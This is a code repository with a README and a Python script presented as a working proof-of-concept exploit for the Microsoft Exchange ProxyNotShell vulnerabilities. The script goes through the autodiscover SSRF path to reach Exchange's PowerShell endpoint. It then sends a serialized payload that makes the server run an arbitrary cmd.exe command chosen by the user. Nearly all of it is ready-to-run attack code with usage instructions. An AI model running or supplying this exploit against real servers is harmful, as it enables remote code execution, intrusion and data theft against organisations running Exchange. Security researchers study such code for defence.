├── README.md
└── poc_aug3.py


/README.md:
--------------------------------------------------------------------------------
 1 | ### Working PoC for CVE-2022-41040 and CVE-2022-41082 (A.K.A ProxyNotShell)
 2 | 
 3 | Requirement:
 4 | 
 5 | - pip install requests_ntlm2 requests
 6 | 
 7 | Usage:
 8 | ```
 9 | python poc_aug3.py <host> <username> <password> <command>
10 | ```
11 | 
12 | Creds:
13 | 
14 | - ProxyShell PoC script from: https://blog.viettelcybersecurity.com/pwn2own-2021-microsoft-exchange-exploit-chain/
15 | 
16 | - Gtsc's blog post
17 | 
18 | - https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend
19 | 


--------------------------------------------------------------------------------
/poc_aug3.py:
--------------------------------------------------------------------------------
  1 | import base64
  2 | import xml.dom.minidom
  3 | import sys
  4 | import uuid
  5 | import struct
  6 | import string
  7 | import random
  8 | 
  9 | import warnings
 10 | warnings.filterwarnings("ignore")
 11 | warnings.filterwarnings("ignore", category=DeprecationWarning)
 12 | from requests_ntlm2 import HttpNtlmAuth
 13 | import requests
 14 | 
 15 | 
 16 | proxies = {}
 17 | 
 18 | USER=sys.argv[2]
 19 | PASSWORD=sys.argv[3]
 20 | CMD=sys.argv[4]
 21 | base_url = sys.argv[1]
 22 | session = requests.Session()
 23 |  
 24 | 
 25 | def post_request(original_url, headers, data = None, cookies = {}):
 26 | 	headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
 27 | 	cookies["Email"] = "autodiscover/admin@localhost"
 28 | 	if "office365" in base_url:
 29 | 		url = base_url + original_url
 30 | 	else:
 31 | 		url = base_url + "/autodiscover/admin@localhost/%s/autodiscover.json?x=a" % original_url
 32 | 
 33 | 	if data is not None:
 34 | 		r = session.post(url, headers=headers, cookies=cookies, data=data, verify=False, proxies=proxies, auth=HttpNtlmAuth('%s' % (USER), PASSWORD))
 35 | 	else:
 36 | 		r = session.get(url, headers=headers, cookies=cookies, verify=False, proxies=proxies)
 37 | 	return r
 38 | 
 39 | def print_error_and_exit(error, r):
 40 | 	print '[+] ', repr(error)
 41 | 	if r is not None:
 42 | 		print '[+] status_code: ', r.status_code
 43 | 		print '[+] response headers: ', repr(r.headers)
 44 | 		print '[+] response: ', repr(r.text)
 45 | 	raise Exception("exploit failed")
 46 | 
 47 | 
 48 | 
 49 | 
 50 | class BasePacket:
 51 | 	def __init__(self, ObjectId = 0, Destination = 2, MessageType = 0, RPID = None, PID = None, Data = ""):
 52 | 		self.ObjectId = ObjectId
 53 | 		self.FragmentId = 0
 54 | 		self.Flags = "\x03"
 55 | 		self.Destination = Destination
 56 | 		self.MessageType = MessageType
 57 | 		self.RPID = RPID
 58 | 		self.PID = PID
 59 | 		self.Data = Data
 60 | 
 61 | 	def __str__(self):
 62 | 		return "ObjectId: " + str(self.ObjectId) + ", FragmentId: " + str(self.FragmentId) + ", MessageType: " + str(self.MessageType) + ", RPID: " + str(self.RPID) + ", PID: " + str(self.PID) + ", Data: " + self.Data
 63 | 
 64 | 	def serialize(self):
 65 | 		Blob = ''.join([struct.pack('I', self.Destination),
 66 | 				struct.pack('I', self.MessageType),
 67 | 				self.RPID.bytes_le,
 68 | 				self.PID.bytes_le,
 69 | 				self.Data
 70 | 			])
 71 | 		BlobLength = len(Blob)
 72 | 		output = ''.join([struct.pack('>Q', self.ObjectId),
 73 | 			struct.pack('>Q', self.FragmentId),
 74 | 			self.Flags,
 75 | 			struct.pack('>I', BlobLength),
 76 | 			Blob ])
 77 | 		return output 
 78 | 
 79 | 	def deserialize(self, data):
 80 | 		total_len = len(data)
 81 | 
 82 | 		i = 0 
 83 | 		self.ObjectId = struct.unpack('>Q', data[i:i+8])[0]
 84 | 		i = i + 8
 85 | 		self.FragmentId = struct.unpack('>Q', data[i:i+8])[0]
 86 | 		i = i + 8
 87 | 		self.Flags = data[i]
 88 | 		i = i + 1
 89 | 		BlobLength = struct.unpack('>I', data[i:i+4])[0]
 90 | 		i = i + 4
 91 | 		Blob = data[i:i+BlobLength]
 92 | 		lastIndex = i + BlobLength
 93 | 
 94 | 		i = 0
 95 | 		self.Destination = struct.unpack('I', Blob[i:i+4])[0]
 96 | 		i = i + 4
 97 | 		self.MessageType = struct.unpack('I', Blob[i:i+4])[0]
 98 | 		i = i + 4
 99 | 		self.RPID = uuid.UUID(bytes_le=Blob[i:i+16])
100 | 		i = i + 16
101 | 		self.PID =  uuid.UUID(bytes_le=Blob[i:i+16])
102 | 		i = i + 16
103 | 		self.Data = Blob[i:]
104 | 
105 | 		return lastIndex
106 | 
107 | class SESSION_CAPABILITY(BasePacket):
108 | 	def __init__(self, ObjectId = 1, RPID = None, PID = None, Data = ""):
109 | 		self.Destination = 2
110 | 		self.MessageType = 0x00010002
111 | 		BasePacket.__init__(self, ObjectId, self.Destination, self.MessageType, RPID, PID, Data)
112 | 
113 | class INIT_RUNSPACEPOOL(BasePacket):
114 | 	def __init__(self, ObjectId = 1, RPID = None, PID = None, Data = ""):
115 | 		self.Destination = 2
116 | 		self.MessageType = 0x00010004
117 | 		BasePacket.__init__(self, ObjectId, self.Destination, self.MessageType, RPID, PID, Data)
118 | 
119 | 
120 | class CreationXML:
121 | 	def __init__(self, sessionCapability, initRunspacPool):
122 | 		self.sessionCapability = sessionCapability
123 | 		self.initRunspacPool = initRunspacPool
124 | 
125 | 	def serialize(self):
126 | 		output = self.sessionCapability.serialize() + self.initRunspacPool.serialize()
127 | 		return base64.b64encode(output)
128 | 
129 | 	def deserialize(self, data):
130 | 		rawdata = base64.b64decode(data)
131 | 		lastIndex = self.sessionCapability.deserialize(rawdata)
132 | 		self.initRunspacPool.deserialize(rawdata[lastIndex:])
133 | 
134 | 	def __str__(self):
135 | 		return self.sessionCapability.__str__() + self.initRunspacPool.__str__()
136 | 
137 | 
138 | class PSCommand(BasePacket):
139 | 	def __init__(self, ObjectId = 1, RPID = None, PID = None, Data = ""):
140 | 		self.Destination = 2
141 | 		self.MessageType = 0x00021006
142 | 		BasePacket.__init__(self, ObjectId, self.Destination, self.MessageType, RPID, PID, Data)
143 | 
144 | 
145 | def create_powershell_shell(SessionId, RPID):
146 | 	print("[+] Create powershell session")
147 | 	headers = {
148 | 		"Content-Type": "application/soap+xml;charset=UTF-8",
149 | 		}
150 | 	url = "/powershell"
151 | 
152 | 	MessageID = uuid.uuid4()
153 | 	OperationID = uuid.uuid4()
154 | 	PID = uuid.UUID('{00000000-0000-0000-0000-000000000000}')
155 | 	sessionData = """<Obj RefId="0"><MS><Version N="protocolversion">2.3</Version><Version N="PSVersion">2.0</Version><Version N="SerializationVersion">1.1.0.1</Version></MS></Obj>"""
156 | 	sessionCapability = SESSION_CAPABILITY(1, RPID, PID, sessionData)
157 | 	initData = """<Obj RefId="0"><MS><I32 N="MinRunspaces">1</I32><I32 N="MaxRunspaces">1</I32><Obj N="PSThreadOptions" RefId="1"><TN RefId="0"><T>System.Management.Automation.Runspaces.PSThreadOptions</T><T>System.Enum</T><T>System.ValueType</T><T>System.Object</T></TN><ToString>Default</ToString><I32>0</I32></Obj><Obj N="ApartmentState" RefId="2"><TN RefId="1"><T>System.Threading.ApartmentState</T><T>System.Enum</T><T>System.ValueType</T><T>System.Object</T></TN><ToString>Unknown</ToString><I32>2</I32></Obj><Obj N="ApplicationArguments" RefId="3"><TN RefId="2"><T>System.Management.Automation.PSPrimitiveDictionary</T><T>System.Collections.Hashtable</T><T>System.Object</T></TN><DCT><En><S N="Key">PSVersionTable</S><Obj N="Value" RefId="4"><TNRef RefId="2" /><DCT><En><S N="Key">PSVersion</S><Version N="Value">5.1.19041.610</Version></En><En><S N="Key">PSEdition</S><S N="Value">Desktop</S></En><En><S N="Key">PSCompatibleVersions</S><Obj N="Value" RefId="5"><TN RefId="3"><T>System.Version[]</T><T>System.Array</T><T>System.Object</T></TN><LST><Version>1.0</Version><Version>2.0</Version><Version>3.0</Version><Version>4.0</Version><Version>5.0</Version><Version>5.1.19041.610</Version></LST></Obj></En><En><S N="Key">CLRVersion</S><Version N="Value">4.0.30319.42000</Version></En><En><S N="Key">BuildVersion</S><Version N="Value">10.0.19041.610</Version></En><En><S N="Key">WSManStackVersion</S><Version N="Value">3.0</Version></En><En><S N="Key">PSRemotingProtocolVersion</S><Version N="Value">2.3</Version></En><En><S N="Key">SerializationVersion</S><Version N="Value">1.1.0.1</Version></En></DCT></Obj></En></DCT></Obj><Obj N="HostInfo" RefId="6"><MS><Obj N="_hostDefaultData" RefId="7"><MS><Obj N="data" RefId="8"><TN RefId="4"><T>System.Collections.Hashtable</T><T>System.Object</T></TN><DCT><En><I32 N="Key">9</I32><Obj N="Value" RefId="9"><MS><S N="T">System.String</S><S N="V">Administrator: Windows PowerShell</S></MS></Obj></En><En><I32 N="Key">8</I32><Obj N="Value" RefId="10"><MS><S N="T">System.Management.Automation.Host.Size</S><Obj N="V" RefId="11"><MS><I32 N="width">274</I32><I32 N="height">72</I32></MS></Obj></MS></Obj></En><En><I32 N="Key">7</I32><Obj N="Value" RefId="12"><MS><S N="T">System.Management.Automation.Host.Size</S><Obj N="V" RefId="13"><MS><I32 N="width">120</I32><I32 N="height">72</I32></MS></Obj></MS></Obj></En><En><I32 N="Key">6</I32><Obj N="Value" RefId="14"><MS><S N="T">System.Management.Automation.Host.Size</S><Obj N="V" RefId="15"><MS><I32 N="width">120</I32><I32 N="height">50</I32></MS></Obj></MS></Obj></En><En><I32 N="Key">5</I32><Obj N="Value" RefId="16"><MS><S N="T">System.Management.Automation.Host.Size</S><Obj N="V" RefId="17"><MS><I32 N="width">120</I32><I32 N="height">3000</I32></MS></Obj></MS></Obj></En><En><I32 N="Key">4</I32><Obj N="Value" RefId="18"><MS><S N="T">System.Int32</S><I32 N="V">25</I32></MS></Obj></En><En><I32 N="Key">3</I32><Obj N="Value" RefId="19"><MS><S N="T">System.Management.Automation.Host.Coordinates</S><Obj N="V" RefId="20"><MS><I32 N="x">0</I32><I32 N="y">0</I32></MS></Obj></MS></Obj></En><En><I32 N="Key">2</I32><Obj N="Value" RefId="21"><MS><S N="T">System.Management.Automation.Host.Coordinates</S><Obj N="V" RefId="22"><MS><I32 N="x">0</I32><I32 N="y">9</I32></MS></Obj></MS></Obj></En><En><I32 N="Key">1</I32><Obj N="Value" RefId="23"><MS><S N="T">System.ConsoleColor</S><I32 N="V">5</I32></MS></Obj></En><En><I32 N="Key">0</I32><Obj N="Value" RefId="24"><MS><S N="T">System.ConsoleColor</S><I32 N="V">6</I32></MS></Obj></En></DCT></Obj></MS></Obj><B N="_isHostNull">false</B><B N="_isHostUINull">false</B><B N="_isHostRawUINull">false</B><B N="_useRunspaceHost">false</B></MS></Obj></MS></Obj>"""
158 | 
159 | 	initRunspacPool = INIT_RUNSPACEPOOL(2, RPID, PID, initData)
160 | 	creationXml = CreationXML(sessionCapability, initRunspacPool).serialize()
161 | 
162 | 	# <rsp:CompressionType s:mustUnderstand="true" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">xpress</rsp:CompressionType>
163 | 	request_data = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
164 | 	<s:Header>
165 | 		<a:To>https://exchange16.domaincorp.com:443/PowerShell?PSVersion=5.1.19041.610</a:To>
166 | 		<w:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI>
167 | 		<a:ReplyTo>
168 | 			<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
169 | 		</a:ReplyTo>
170 | 		<a:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>
171 | 		<w:MaxEnvelopeSize s:mustUnderstand="true">512000</w:MaxEnvelopeSize>
172 | 		<a:MessageID>uuid:{MessageID}</a:MessageID>
173 | 		<w:Locale xml:lang="en-US" s:mustUnderstand="false" />
174 | 		<p:DataLocale xml:lang="en-US" s:mustUnderstand="false" />
175 | 		<p:SessionId s:mustUnderstand="false">uuid:{SessionId}</p:SessionId>
176 | 		<p:OperationID s:mustUnderstand="false">uuid:{OperationID}</p:OperationID>
177 | 		<p:SequenceId s:mustUnderstand="false">1</p:SequenceId>
178 | 		<w:OptionSet xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" s:mustUnderstand="true">
179 | 		
180 | 			<w:Option Name="protocolversion" MustComply="true">2.3</w:Option>
181 | 		</w:OptionSet>
182 | 		<w:OperationTimeout>PT180.000S</w:OperationTimeout>
183 | 	</s:Header>
184 | 	<s:Body>
185 | 		<rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" Name="WinRM10" >
186 | 			<rsp:InputStreams>stdin pr</rsp:InputStreams>
187 | 			<rsp:OutputStreams>stdout</rsp:OutputStreams>
188 | 			<creationXml xmlns="http://schemas.microsoft.com/powershell">{creationXml}</creationXml>
189 | 		</rsp:Shell>
190 | 	</s:Body>
191 | </s:Envelope>""".format(OperationID=OperationID, MessageID=MessageID, SessionId=SessionId, creationXml=creationXml)
192 | 	r = post_request(url, headers, request_data, {})
193 | 	if r.status_code == 200:
194 | 		doc = xml.dom.minidom.parseString(r.text);
195 | 		elements = doc.getElementsByTagName("rsp:ShellId")
196 | 		if len(elements) == 0:
197 | 			print_error_and_exit("create_powershell_shell failed with no ShellId return", r)
198 | 		ShellId = elements[0].firstChild.nodeValue
199 | 		# print "[+] Got ShellId: {ShellId}".format(ShellId=ShellId)
200 | 		print "[+] Got ShellId success"
201 | 		return ShellId
202 | 	else:
203 | 		print_error_and_exit("create_powershell_shell failed", r)
204 | 
205 | 
206 | 
207 | def run_cmdlet_new_offlineaddressbook(SessionId, RPID, ShellId):
208 | 	print "[+] Run cmdlet new-offlineaddressbook"
209 | 	headers = {
210 | 		"Content-Type": "application/soap+xml;charset=UTF-8",
211 | 		}
212 | 	url = "/powershell"
213 | 
214 | 	name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
215 | 
216 | 	# commandData = open("psobject_memshell.txt", "rb").read()
217 | 	commandData = """<Obj RefId="13">
218 | 			<TN RefId="0">
219 | 				<T>System.Management.Automation.PSCustomObject</T>
220 | 				<T>System.Object</T>
221 | 			</TN>
222 | 			<MS>
223 | 				<S N="N">-Identity:</S>
224 | 								<!--Object type section-->
225 | 				<Obj N="V" RefId="14">
226 | 					<TN RefId="2">
227 | 					<T>System.ServiceProcess.ServiceController</T>
228 | 						<T>System.Object</T>
229 | 					</TN>
230 | 					<ToString>System.ServiceProcess.ServiceController</ToString>
231 | 
232 | 					<Props>
233 | 						<S N="Name">Type</S>
234 | 						<Obj N="TargetTypeForDeserialization">
235 | 							<TN RefId="2">
236 | 								<T>System.Exception</T>
237 | 								<T>System.Object</T>
238 | 							</TN>
239 | 							<MS>
240 | 								<BA N="SerializationData">AAEAAAD/////AQAAAAAAAAAEAQAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBgIAAAAgU3lzdGVtLldpbmRvd3MuTWFya3VwLlhhbWxSZWFkZXIEAAAABgMAAABYUHJlc2VudGF0aW9uRnJhbWV3b3JrLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQs=</BA>
241 | 							</MS>
242 | 						</Obj>
243 | 					</Props>
244 | 
245 | 					<S>
246 |                         <![CDATA[<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider x:Key="LaunchCalch" ObjectType="{{x:Type Diag:Process}}" MethodName="Start"><ObjectDataProvider.MethodParameters><System:String>cmd.exe</System:String><System:String>/c {CMD}</System:String> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> </ResourceDictionary>]]>
247 | 					</S>
248 | 
249 | 				</Obj>
250 | 			</MS>
251 | 		</Obj>
252 | 	""".format(CMD=CMD)
253 | 	PID = uuid.uuid4()
254 | 	# print '[+] Pipeline ID: ', PID
255 | 	print('[+] Create powershell pipeline')
256 | 	c = PSCommand(3, RPID, PID, commandData)
257 | 	command_arguments = base64.b64encode(c.serialize())
258 | 	
259 | 	MessageID = uuid.uuid4()
260 | 	OperationID = uuid.uuid4()
261 | 	request_data = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
262 | 	<s:Header>
263 | 		<a:To>https://exchange16.domaincorp.com:443/PowerShell?PSVersion=5.1.19041.610</a:To>
264 | 		<a:ReplyTo>
265 | 			<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
266 | 		</a:ReplyTo>
267 | 		<a:Action s:mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action>
268 | 		<w:MaxEnvelopeSize s:mustUnderstand="true">512000</w:MaxEnvelopeSize>
269 | 		<a:MessageID>uuid:{MessageID}</a:MessageID>
270 | 		<w:Locale xml:lang="en-US" s:mustUnderstand="false" />
271 | 		<p:DataLocale xml:lang="en-US" s:mustUnderstand="false" />
272 | 		<p:SessionId s:mustUnderstand="false">uuid:{SessionId}</p:SessionId>
273 | 		<p:OperationID s:mustUnderstand="false">uuid:{OperationID}</p:OperationID>
274 | 		<p:SequenceId s:mustUnderstand="false">1</p:SequenceId>
275 | 		<w:ResourceURI xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd">http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI>
276 | 		<w:SelectorSet xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd">
277 | 			<w:Selector Name="ShellId">{ShellId}</w:Selector>
278 | 		</w:SelectorSet>
279 | 		<w:OperationTimeout>PT180.000S</w:OperationTimeout>
280 | 	</s:Header>
281 | 	<s:Body>
282 | 	<rsp:CommandLine xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" CommandId="{CommandId}" >
283 | 		<rsp:Command>New-OfflineAddressBook</rsp:Command>
284 | 		<rsp:Arguments>{command_arguments}</rsp:Arguments>
285 | 	</rsp:CommandLine>
286 | </s:Body>
287 | </s:Envelope>""".format(SessionId=SessionId, MessageID=MessageID, OperationID=OperationID, ShellId=ShellId, CommandId=str(PID), command_arguments=command_arguments)
288 | 	r = post_request(url, headers, request_data, {})
289 | 	# if r.status_code == 200:
290 | 	# 	doc = xml.dom.minidom.parseString(r.text)
291 | 	# 	elements = doc.getElementsByTagName("rsp:CommandId")
292 | 	# 	if len(elements) == 0:
293 | 	# 		print_error_and_exit("run_cmdlet_new_offlineaddressbook failed with no CommandId return", r)
294 | 	# 	CommandId = elements[0].firstChild.nodeValue
295 | 	# 	# print "[+] Got CommandId: {CommandId}".format(CommandId=CommandId)
296 | 	# 	print "[+] Got CommandId success"
297 | 	# 	return CommandId
298 | 	# else:
299 | 	# 	print_error_and_exit("run_cmdlet_new_offlineaddressbook failed", r)
300 | 
301 | def request_keepalive(SessionId, ShellId):
302 | 	print "[+] Run keeping alive request"
303 | 	headers = {
304 | 		"Content-Type": "application/soap+xml;charset=UTF-8",
305 | 		}
306 | 	url = "/powershell"
307 | 	MessageID = uuid.uuid4()
308 | 	OperationID = uuid.uuid4()
309 | 	request_data = """<s:Envelope xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wsmv="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
310 |     <s:Header>
311 |         <wsa:Action s:mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</wsa:Action>
312 |         <wsmv:DataLocale s:mustUnderstand="false" xml:lang="en-US" />
313 |         <wsman:Locale s:mustUnderstand="false" xml:lang="en-US" />
314 |         <wsman:MaxEnvelopeSize s:mustUnderstand="true">512000</wsman:MaxEnvelopeSize>
315 |         <wsa:MessageID>uuid:{MessageID}</wsa:MessageID>
316 |         <wsman:OperationTimeout>PT20S</wsman:OperationTimeout>
317 |         <wsa:ReplyTo>
318 |             <wsa:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address>
319 |         </wsa:ReplyTo>
320 |         <wsman:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</wsman:ResourceURI>
321 |         <wsmv:SessionId s:mustUnderstand="false">uuid:{SessionId}</wsmv:SessionId>
322 |         <wsa:To>http://ex01.lab.local/</wsa:To>
323 |         <wsman:OptionSet s:mustUnderstand="true">
324 |             <wsman:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">True</wsman:Option>
325 |         </wsman:OptionSet>
326 |         <wsman:SelectorSet>
327 |             <wsman:Selector Name="ShellId">{ShellId}</wsman:Selector>
328 |         </wsman:SelectorSet>
329 |     </s:Header>
330 |     <s:Body>
331 |         <rsp:Receive>
332 |             <rsp:DesiredStream>stdout</rsp:DesiredStream>
333 |         </rsp:Receive>
334 |     </s:Body>
335 | 	</s:Envelope>""".format(SessionId=SessionId, MessageID=MessageID, OperationID=OperationID, ShellId=ShellId)
336 | 	r = post_request(url, headers, request_data, {})
337 | 	if r.status_code == 200:
338 | 		print "[+] Success keeping alive"
339 | 	else:
340 | 		print_error_and_exit("keeping alive failed", r)
341 | 
342 | def remove_session(SessionId, ShellId):
343 | 	print "[+] Run keeping alive request"
344 | 	headers = {
345 | 		"Content-Type": "application/soap+xml;charset=UTF-8",
346 | 		}
347 | 	url = "/powershell"
348 | 	MessageID = uuid.uuid4()
349 | 	OperationID = uuid.uuid4()
350 | 	request_data = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wsmv="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
351 |     <s:Header>
352 |         <wsa:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</wsa:Action>
353 |         <wsmv:DataLocale s:mustUnderstand="false" xml:lang="en-US" />
354 |         <wsman:Locale s:mustUnderstand="false" xml:lang="en-US" />
355 |         <wsman:MaxEnvelopeSize s:mustUnderstand="true">512000</wsman:MaxEnvelopeSize>
356 |         <wsa:MessageID>uuid:{MessageID}</wsa:MessageID>
357 |         <wsman:OperationTimeout>PT20S</wsman:OperationTimeout>
358 |         <wsa:ReplyTo>
359 |             <wsa:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address>
360 |         </wsa:ReplyTo>
361 |         <wsman:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</wsman:ResourceURI>
362 |         <wsmv:SessionId s:mustUnderstand="false">uuid:{SessionId}</wsmv:SessionId>
363 |         <wsa:To>http://ex01.lab.local/</wsa:To>
364 |         <wsman:SelectorSet>
365 |             <wsman:Selector Name="ShellId">{ShellId}</wsman:Selector>
366 |         </wsman:SelectorSet>
367 |     </s:Header>
368 |     <s:Body />
369 | </s:Envelope>""".format(SessionId=SessionId, MessageID=MessageID, OperationID=OperationID, ShellId=ShellId)
370 | 	r = post_request(url, headers, request_data, {})
371 | 	if r.status_code == 200:
372 | 		print "[+] Success remove session"
373 | 	else:
374 | 		print_error_and_exit("remove session failed", r)
375 | 
376 | MessageID = uuid.uuid4()
377 | OperationID = uuid.uuid4()
378 | SessionId = uuid.uuid4()
379 | PID = uuid.UUID('{00000000-0000-0000-0000-000000000000}')
380 | RPID = uuid.uuid4()
381 | 
382 | shell_id = create_powershell_shell(SessionId, RPID)
383 | request_keepalive(SessionId, shell_id)
384 | run_cmdlet_new_offlineaddressbook(SessionId, RPID, shell_id)
385 | remove_session(SessionId, shell_id)


--------------------------------------------------------------------------------